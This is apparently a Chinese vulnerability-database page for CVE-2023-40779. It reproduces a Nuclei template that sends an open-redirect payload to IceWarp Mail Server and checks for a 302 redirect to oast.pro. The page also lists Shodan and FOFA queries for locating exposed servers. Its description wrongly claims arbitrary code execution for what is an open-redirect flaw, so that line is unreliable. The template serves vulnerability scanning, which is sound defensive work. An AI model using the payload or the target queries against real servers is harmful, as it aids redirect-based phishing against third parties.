CVE-2023-40779: IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect

日期: 2025-08-01 | 影响软件: IceWarp Mail Server Deep Castle 2 | POC: 已公开

漏洞描述

An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.

PoC代码[已公开]

id: CVE-2023-40779

info:
  name: IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect
  author: r3Y3r53
  severity: medium
  description: |
    An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.
  reference:
    - https://medium.com/@muthumohanprasath.r/open-redirection-vulnerability-on-icewarp-webclient-product-cve-2023-40779-61176503710
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40779
    - https://medium.com/%40muthumohanprasath.r/open-redirection-vulnerability-on-icewarp-webclient-product-cve-2023-40779-61176503710
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-40779
    cwe-id: CWE-601
    epss-score: 0.28157
    epss-percentile: 0.96335
    cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: icewarp
    product: deep_castle_g2
    shodan-query:
      - title:"IceWarp"
      - http.title:"icewarp"
    fofa-query: title="icewarp"
    google-query: intitle:"icewarp"
  tags: cve2023,cve,icewarp,redirect

http:
  - method: GET
    path:
      - "{{BaseURL}}/%5coast.pro/%2f%2e%2e"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'

      - type: status
        status:
          - 302
# digest: 4a0a00473045022100aed54f9bbb515acebeeacde652666e531f457ad85d5e38b7fdc223fd28bdbc5202205738035ece7408bcc16a05a8a97dd2141bd77aa9187d737637cf94a10c7484e3:922c64590222798bb761d5b6d8e72950

相关漏洞推荐